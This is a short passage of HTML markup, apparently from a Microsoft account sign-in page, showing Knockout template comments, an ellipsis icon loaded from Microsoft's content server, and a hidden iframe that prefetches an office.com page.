!isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="mobileMode" role="presentation" pngsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png" svgsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg" data-bind="imgSrc" src="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg"><!-- /ko --> <!-- /ko --><!-- /ko --> </a>
            </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko -->
      </div> <!-- /ko -->
    </div><!-- /ko --> <!-- ko foreach: postRedirectParams --><!-- /ko --> <!-- ko if: svr.urlMsaStaticMeControl --><!-- /ko --><!-- ko if: svr.urlCBPartnerPreload -->
    <div id="idPartnerPL" data-bind="injectIframe: { url: svr.urlCBPartnerPreload }"><iframe style="display: none;" src="https://www.office.com/prefetch/prefetch" width="0" height="0"></iframe></div> <!-- /ko -->

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